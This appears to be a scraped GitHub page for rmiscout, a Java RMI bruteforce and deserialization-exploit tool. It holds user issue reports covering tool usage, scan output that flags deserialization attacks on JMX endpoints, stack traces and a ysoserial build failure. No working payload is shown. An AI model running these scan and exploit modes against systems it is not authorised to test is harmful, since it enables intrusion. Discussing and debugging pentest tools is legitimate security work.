[ rmiscout]# rmiscout wordlist -i lists/prototypes.txt server port --activation-server
[INFO] No registry specified. Attempting operation on all available registries...
[ERROR] RMI Activation Server detected. Re-run with --activation-server

Barmie will detect the endpoints:

RMI Registry at server:port
Objects exposed: 3
Object 1
  Name: ABCD/7676/jmxrmi
  Endpoint: server:port1
  Classes: 3
    Class 1
      Classname: javax.management.remote.rmi.RMIServerImpl_Stub
    Class 2
      Classname: java.rmi.server.RemoteStub
    Class 3
      Classname: java.rmi.server.RemoteObject
Object 2
  Name: management/rmi-jmx-connector
  Endpoint: server:port2
  Classes: 3
    Class 4
      Classname: javax.management.remote.rmi.RMIServerImpl_Stub
    Class 5
      Classname: java.rmi.server.RemoteStub
    Class 6
      Classname: java.rmi.server.RemoteObject
Object 3
  Name: jmxrmi
  Endpoint: server:port3
  Classes: 3
    Class 7
      Classname: javax.management.remote.rmi.RMIServerImpl_Stub
    Class 8
      Classname: java.rmi.server.RemoteStub
    Class 9
      Classname: java.rmi.server.RemoteObject

2 potential attacks identified (+++ = more reliable)
[--+] JMX Deserialization
[---] Java RMI registry illegal bind deserialization

0 deserialization gadgets found on leaked CLASSPATH
[~] Gadgets may still be present despite CLASSPATH not being leaked

Successfully scanned 1 target(s) for objects exposed via RMI.

java.lang.ClassNotFoundException: com.sun.corba.se.spi.logging.LogWrapperBase

Bug: ClassNotFoundException always printed

$ java -jar rmiscout-1.4-SNAPSHOT-all.jar -h
java.lang.ClassNotFoundException: com.sun.corba.se.spi.logging.LogWrapperBase
        at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581)
        at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
        at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
        at java.base/java.lang.Class.forName0(Native Method)
        at java.base/java.lang.Class.forName(Class.java:315)
        at com.bishopfox.rmiscout.RMIScout.disableAccessWarnings(RMIScout.java:75)
        at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:170)
usage: rmiscout [-h] MODE ...

Bruteforce and exploit RMI interfaces

named arguments:
  -h, --help             show this help message and exit

Modes of operation:
  MODE
    wordlist             Dictionary attack on RMI interfaces using a prototype wordlist
    bruteforce           Bruteforce attack on RMI interfaces
    exploit              Exploit RMI methods using type-mismatch deserialization attack
    probe                Use GadgetProbe  to  enumerate  classes  available  on  the remote
                         classpath
    invoke               Invoke methods using primitives or Strings
    list                 List available registry names

It seems any time that the rmiscout jar is run, the above stack trace about LogWrapperBase is printed. It seems as if the jar is working fine other than printing the error, but this is also the first time I am attempting to use it so I'm not sure if any functionality is affected.

I do have a server with an RMI port open according to nmap

...
41428/tcp open  java-rmi       Java RMI
...

However when running java -jar rmiscout-1.4-SNAPSHOT-all.jar list TARGET_IP 41428, the tool reports the following:

-- (LogWrapperBase exception snipped out) --
Server is offline or does not use RMI, RMI-SSL, or RMI-IIOP

Because of the exception, and the fact that nmap reports the port as an RMI service, I am worried that rmiscout is not working properly.

This jar file was directly downloaded from the repository releases page, v1.4 specifically.
https://github.com/BishopFox/rmiscout/releases/tag/v1.4

Java version:

$ java --version
openjdk 11.0.7-ea 2020-04-14
OpenJDK Runtime Environment (build 11.0.7-ea+9-post-Debian-1)
OpenJDK 64-Bit Server VM (build 11.0.7-ea+9-post-Debian-1, mixed mode, sharing)

I am running Kali Linux if that matters for some reason.

$ uname -a
Linux hostname 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64 GNU/Linux

Gradle build fails on ysoserial dependency

Description of Bug

When attempting to build the Jar using Gradle, it fails with the error Could not find com.github.frohoff:ysoserial:master-SNAPSHOT.

What should the expected behavior be

All dependencies resolve properly so that the project build can successfully finish.

Steps to Reproduce

Run gradlew script to build the project

$ ./gradlew -Dorg.gradle.java.home=/usr/lib/jvm/java-8-openjdk-amd64 shadowJar
Starting a Gradle Daemon, 1 incompatible Daemon could not be reused, use --status for details

FAILURE: Build failed with an exception.

* What went wrong:
Could not determine the dependencies of task ':shadowJar'.
> Could not resolve all dependencies for configuration ':runtimeClasspath'.
   > Could not find com.github.frohoff:ysoserial:master-SNAPSHOT.
     Searched in the following locations:
       - https://repo.maven.apache.org/maven2/com/github/frohoff/ysoserial/master-SNAPSHOT/maven-metadata.xml
       - https://repo.maven.apache.org/maven2/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.pom
       - https://repo.maven.apache.org/maven2/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
       - https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/maven-metadata.xml
       - https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-2874a69f61-1.pom
       - https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-2874a69f61-1.jar
       - https://repo.spring.io/plugins-release/com/github/frohoff/ysoserial/master-SNAPSHOT/maven-metadata.xml
       - https://repo.spring.io/plugins-release/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.pom
       - https://repo.spring.io/plugins-release/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
       - https://repo.jenkins-ci.org/public/com/github/frohoff/ysoserial/master-SNAPSHOT/maven-metadata.xml
       - https://repo.jenkins-ci.org/public/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.pom
       - https://repo.jenkins-ci.org/public/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
     Required by:
         project :

* Try:
Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights.

* Get more help at https://help.gradle.org

BUILD FAILED in 8s

Additional context

$ /usr/lib/jvm/java-8-openjdk-amd64/bin/java -version
openjdk version "1.8.0_342"
OpenJDK Runtime Environment (build 1.8.0_342-8u342-b07-0ubuntu1~20.04-b07)
OpenJDK 64-Bit Server VM (build 25.342-b07, mixed mode)

bishopfox / rmiscout Goto Github PK

rmiscout's Introduction

Description

Feature overview

How it works

Modes of operation

Wordlist mode

Bruteforce mode

Exploit mode

Invoke mode

Probe mode

Building and Running

Try It out

Troubleshooting

Author

rmiscout's People

Contributors

Stargazers

Watchers

Forkers

rmiscout's Issues

Description of Bug

What should the expected behavior be

Platform Affected

Steps to Reproduce

[ERROR] RMI Activation Server detected. Re-run with --activation-server

Bug: ClassNotFoundException always printed

Description of Bug

What should the expected behavior be

Steps to Reproduce

Additional context

Recommend Projects

Recommend Topics

Recommend Org